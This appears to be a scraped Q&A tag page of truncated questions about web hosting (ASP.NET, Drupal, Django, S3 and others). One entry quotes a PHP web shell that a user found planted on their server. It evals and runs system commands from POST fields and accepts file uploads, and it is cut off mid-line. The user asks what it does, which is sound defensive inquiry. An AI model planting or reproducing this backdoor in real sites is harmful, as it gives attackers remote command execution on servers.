hosting

Silverlight and RIA Service without ASP.NET

Hi, I'm pretty new to Silverlight/RIA/Asp.Net thing, and I'm trying to figure if an Asp.Net website is required (for hosting the app) if I wish to use RIA services with Silverlight? ...

How do I host a project ?

I came to this iste because it advertised that it was the best place to host a project. ...

web hosting video files and large files

Hi, I would like to make a website to host videos, and/or large files to a large community of 5000 for example. What would be the best solution? Thanks. ...

Hosted WebBrowser control attempts to download Flash content rather than playing it

I am hosting an IE browser control in a simple, .NET winforms app. When I make the control navigate to certain content on disk, the control attempts to download the file (rather than displaying the content.) The exact same URL when pasted into the IE browser will properly display the swf file in question along with processed XML data th...

Avoid This collection already contains an address with scheme http

Hi all, I have this issue: I have WebSite with asp.net pages. http://desiis:90/WebSite1 In this webSite, I have a Service WCF (service1.svc). http://desiis:90/WebSite1/services/Service1.svc When I call to the service, I get this error: This collection already contains an address with scheme http In my localhost all is OK. any s...

ASP.NET FREE WEBHOSTING

Hi guys, very easy question. Can somebody give me advice, where to find free webhosting with support of sql server 2008, .net framework 3.5 ? Sorry for this kind of question, but I'm in hurry and I can't help myself with finding something usable. ...

Sub domain issue

I am new to web hosting, never done it before. I am working on my assignment for uni. and wanted to know if I can create multiple subdomains when I am hosted with a webhost. I want to be able to do the following: 1. users can sign up and get a subdomain of their choice. 2. users are allocated a limited webspace 3. The access to file typ...

How to install only Joomla site pages without administrator pages on a server

Hi, I have prepared my simple html website on my local pc. Now I want to put only the main website pages without administrator backend pages on server. I tried several queries on google but of no use. ...

drupal php: problem with hosting a new drupal site

I am a newbie to drupal. I try to host it on a free hosting (german) kilue.de.(apache, mysql5.0) To test what I have done locally , on the site : 1- I create the database using phpmyadmin 2 -I copied what I have under /var/ww using FTP Once I launch my site using given uurl , I have this message : * warning: realpath() [function.real...

problem with drupal when I change some configuration

I am a drupal newbie. Can anyone tell me what is the meaning of such warning. warning: Parameter 1 to profile_load_profile() expected to be a reference, value given in /data/multiserv/users/395147/projects/730411/www/includes/module.inc on line 462. The line on question contains : ** * Invoke a hook in a particular module. * * @pa...

What do I need to configure to host django applications on linode?

Hi, I am about to choose hosting provider for my Django project. I took a look on a linode and it looks very promissing. It looks like very elastic solution but in my case this might be a disadvnatage since I'm not so experienced in servers configuration (alternative provider for me has great tools to quickly do the job, but linode has ...

ASP.NET hosting - limited number of database accounts

My ASP.NET host only allows 3 database users per db other than the dbo. I have one for the web app that only runs stored procs and has limited selects to tables. One for ASP.NET membership/roles. One for SQL cache dependency/notification. One for logging - ELMAH / log4net. How would you consolidate the 4 users into 3? How do you ...

Develop .NET application for free?

Possible Duplicate: Are Microsoft Express editions free to develop on? Is there software available that allows a developer to write .NET applications with SQL Server for free, meaning without buying Visual Studio and SQL Server. As long as you buy Windows web hosting (w/ support for .NET and SQL Server), is there software too...

What's the best way to move everything off of system folder on to s3?

Exploring around S3's UI, it seems they only enjoy file uploads from my local box. Is there a way to push the files directly from my production server to an s3 account? ...

Push Notification - Dedicated server required?

Hi. I'm thinking of developing an app that uses Microsoft Push Notification. However, I'm not quite sure what I need on my server. I've currently got a shared hosting account. Can I use this as my server to use Push Notification, or does the server have to be dedicated? Thanks ...

What's the purpose of this PHP code/hack.?

I recently found 4 bizarre files on my server (that I didn't upload). The filename were like this: goog1e7a20543b128921.php And here's the code that was inside them: Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES...

How to hide the root of my webserver, which holds multiple sites, from the world?

I have a deluxe hosting account with Godaddy which allows for multiple sites to be installed on one server. Problem is the root of the server is a site. www.rootsite.com when inspecting all other sites on the server (which are in their own folders) with firebug I see www.rootsite.com/newsite instead of www.newsite.com I would like it ...

My web host is adding ?PHPSESSID=fgh2h45... to the end of the URL...

I'm using iPage.com host. In order to use PHP sessions in their host I need to add session_save_path('/home/users/web/.../cgi-bin/tmp'); at the start of each page (in my case only index.php because everything goes trough index.php first). Now, they automatically add the session id to the end of every URL requested like this: website.com...

Tens of millions of small files, where to host them? (prefer a free one)

I have over 10 million small static html files (10K each). And I am an user of bluehost.com. It have a limitation of 50000 files. It sent an email to warn me that if I didn't delete the files in 30 days, it would disable my account. So I am looking for a free service to host my files. I considered google app engine, but it has a even mo...

Predictable Burst Hosting

I run a Rails web app that generally has moderate traffic (100 requests/hour at most). However, I get a relatively high burst of traffic once every few weeks (50 requests/sec for 2 hours) at a time that I can anticipate. Over the next few months, I expect both the moderate and peak traffic to increase, but their relative magnitudes will ...